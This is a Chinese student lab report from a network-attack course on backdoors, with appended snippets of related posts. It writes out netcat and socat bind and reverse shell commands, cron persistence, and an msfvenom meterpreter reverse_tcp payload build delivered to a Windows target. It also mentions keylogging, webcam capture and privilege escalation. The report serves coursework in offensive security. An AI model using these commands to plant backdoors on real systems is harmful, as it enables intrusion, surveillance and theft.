20145204《網路對抗》MAL後門原理與實踐

2022-07-17 17:30:19 字數 2171 閱讀 2092

(1)使用netcat獲取主機操作shell,cron啟動 (1分)

(2)使用socat獲取主機操作shell, 任務計畫啟動 (1分)

(3)使用msf meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機shell(1分)

(4)使用msf meterpreter生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權 (2分)

(1)例舉乙個後門進入到你系統中的可能方式?

(2)例舉乙個後門啟動起來(win及linux)的方式?

後門偽裝成常用軟體,誘使使用者點選。

(3)meterpreter有哪些給你映像深刻的功能?

獲得system許可權,得到密碼

(4)如何發現自己有系統有沒有被安裝後門?

在做後門的實驗,深刻意識到了後門的危害性,一旦中招,基本攻擊者想知道的資訊都能獲得,在利用meterpreter提取win7許可權竟然成功,看來以後要經常查毒了。

知識要求:

1.netcat是乙個非常簡單的unix工具,可以讀、寫tcp或udp網路連線(network connection);

2.netcat實現簡單伺服器命令:nc -l -p //-l表明nc處於監聽模式,-p指定埠號;

3.nc的-e選項,指定連線後執行的程式。

windows獲得linux shell

linux獲得windows shell。

與上面步驟相反,只不過windows設定連線後啟動cmd。

以下是實驗結果:

ncat檔案傳輸

1、監聽端windows命令:ncat.exe -lv port > filename

2、傳輸端kali命令:nc windows_ip port < filename

結果如下(傳輸的檔案在ncat資料夾下):

cron啟動

命令:crontab -e修改檔案,crontab -l檢視修改的檔案。

windows獲得kali shell

1、kali設定監聽命令socat tcp-l:5204 system:bash,pty,stderr

2、windows連線,並獲取許可權socat readline tcp:172.30.1.181 5204

結果:

kali獲得window shell

1、windows端如下圖:

2、kali端如下:

1、生成後門程式命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=linux_ip lport=444 -f exe >20145204.exe

2、利用ncat傳輸檔案使得後門程式進入靶機,具體實現如下圖所示:

3、根據老師教程,在kali中開啟msf設定監聽。

4、在windows端執行後門程式,並獲得許可權如下圖所示:

結果如下:

20145204《網路對抗》資訊收集和漏洞掃瞄技術

本實踐的目標是掌握資訊蒐集的最基礎技能。1 各種搜尋技巧的應用 2 dns ip註冊資訊的查詢 3 基本的掃瞄技術 主機發現 埠掃瞄 os及服務版本探測 具體服務的查點 4 漏洞掃瞄 會掃,會看報告,會查漏洞說明,會修補漏洞 哪些組織負責dns,ip的管理。全球根伺服器均由美國 授權的icann統一...

20155232《網路對抗》Exp7 網路欺詐防範

本實踐的目標理解常用網路欺詐背後的原理,以提高防範意識,並提出具體防範方法。具體實踐有 1 簡單應用set工具建立冒名 1分 2 ettercap dns spoof 1分 3 結合應用兩種技術,用dns spoof引導特定訪問到冒名 1.5分 netstat tupln grep 80指令檢視80...

2015511《網路對抗》網路欺詐技術防範

ping通kali和靶機 因為之後用apache會用到80埠,所以先檢視80埠是否被占用,netstat tupln grep 80,如果有可以用kill 程序號殺死這兩個程序,再次檢視80埠占用情況,沒有被占用的程序 用vi開啟 etc apache2 ports.conf,檢視配置檔案中的監聽埠...